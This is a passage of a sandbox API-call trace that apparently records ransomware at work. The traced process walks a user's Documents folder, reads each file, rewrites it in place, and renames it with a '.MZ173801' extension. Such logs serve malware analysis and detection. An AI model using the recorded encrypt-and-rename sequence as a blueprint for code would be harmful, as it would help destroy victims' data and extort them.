UI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.387] GetCurrentThreadId () returned 0x1358 [0122.387] GetCurrentThreadId () returned 0x1358 [0122.387] GetCurrentThreadId () returned 0x1358 [0122.387] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\MkfvC5YVoY.csv" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\mkfvc5yvoy.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.387] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.387] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.387] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x1800d [0122.387] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.387] ReadFile (in: hFile=0x408, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x1800d, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f418*=0x1800d, lpOverlapped=0x0) returned 1 [0122.388] CloseHandle (hObject=0x408) returned 1 [0122.390] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\MkfvC5YVoY.csv" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\mkfvc5yvoy.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.391] WriteFile (in: hFile=0x408, lpBuffer=0x23be7d0*, nNumberOfBytesToWrite=0x1800d, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23be7d0*, lpNumberOfBytesWritten=0x19f424*=0x1800d, lpOverlapped=0x0) returned 1 [0122.394] CloseHandle (hObject=0x408) returned 1 [0122.394] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\MkfvC5YVoY.csv" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\mkfvc5yvoy.csv"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\MkfvC5YVoY.csv.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\mkfvc5yvoy.csv.mz173801")) returned 1 [0122.394] GetCurrentThreadId () returned 0x1358 [0122.394] GetCurrentThreadId () returned 0x1358 [0122.394] GetCurrentThreadId () returned 0x1358 [0122.394] GetCurrentThreadId () returned 0x1358 [0122.394] GetCurrentThreadId () returned 0x1358 [0122.394] GetCurrentThreadId () returned 0x1358 [0122.394] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd505c450, ftCreationTime.dwHighDateTime=0x1d5e535, ftLastAccessTime.dwLowDateTime=0x4ce59df0, ftLastAccessTime.dwHighDateTime=0x1d5e95b, ftLastWriteTime.dwLowDateTime=0x4ce59df0, ftLastWriteTime.dwHighDateTime=0x1d5e95b, nFileSizeHigh=0x0, nFileSizeLow=0xeb4d, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="N68wVE30d.xls", cAlternateFileName="N68WVE~1.XLS")) returned 1 [0122.395] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.395] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.395] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\N68wVE30d.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\n68wve30d.xls"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd505c450, ftCreationTime.dwHighDateTime=0x1d5e535, ftLastAccessTime.dwLowDateTime=0x4ce59df0, ftLastAccessTime.dwHighDateTime=0x1d5e95b, ftLastWriteTime.dwLowDateTime=0x4ce59df0, ftLastWriteTime.dwHighDateTime=0x1d5e95b, nFileSizeHigh=0x0, nFileSizeLow=0xeb4d)) returned 1 [0122.395] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.395] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.395] GetCurrentThreadId () returned 0x1358 [0122.395] GetCurrentThreadId () returned 0x1358 [0122.395] GetCurrentThreadId () returned 0x1358 [0122.396] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.396] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.396] GetCurrentThreadId () returned 0x1358 [0122.396] GetCurrentThreadId () returned 0x1358 [0122.396] GetCurrentThreadId () returned 0x1358 [0122.396] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\N68wVE30d.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\n68wve30d.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.396] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.396] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.396] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0xeb4d [0122.396] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.397] ReadFile (in: hFile=0x408, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xeb4d, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0xeb4d, lpOverlapped=0x0) returned 1 [0122.398] CloseHandle (hObject=0x408) returned 1 [0122.399] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\N68wVE30d.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\n68wve30d.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.400] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xeb4d, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0xeb4d, lpOverlapped=0x0) returned 1 [0122.402] CloseHandle (hObject=0x408) returned 1 [0122.402] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\N68wVE30d.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\n68wve30d.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\N68wVE30d.xls.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\n68wve30d.xls.mz173801")) returned 1 [0122.403] GetCurrentThreadId () returned 0x1358 [0122.403] GetCurrentThreadId () returned 0x1358 [0122.403] GetCurrentThreadId () returned 0x1358 [0122.403] GetCurrentThreadId () returned 0x1358 [0122.403] GetCurrentThreadId () returned 0x1358 [0122.403] GetCurrentThreadId () returned 0x1358 [0122.403] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4de1bf80, ftCreationTime.dwHighDateTime=0x1d5ec40, ftLastAccessTime.dwLowDateTime=0x4a210cf0, ftLastAccessTime.dwHighDateTime=0x1d5ed0f, ftLastWriteTime.dwLowDateTime=0x4a210cf0, ftLastWriteTime.dwHighDateTime=0x1d5ed0f, nFileSizeHigh=0x0, nFileSizeLow=0xd1aa, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="Ons82gm.pdf", cAlternateFileName="")) returned 1 [0122.403] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.403] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.403] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\Ons82gm.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\ons82gm.pdf"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4de1bf80, ftCreationTime.dwHighDateTime=0x1d5ec40, ftLastAccessTime.dwLowDateTime=0x4a210cf0, ftLastAccessTime.dwHighDateTime=0x1d5ed0f, ftLastWriteTime.dwLowDateTime=0x4a210cf0, ftLastWriteTime.dwHighDateTime=0x1d5ed0f, nFileSizeHigh=0x0, nFileSizeLow=0xd1aa)) returned 1 [0122.404] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.404] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.404] GetCurrentThreadId () returned 0x1358 [0122.404] GetCurrentThreadId () returned 0x1358 [0122.404] GetCurrentThreadId () returned 0x1358 [0122.404] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 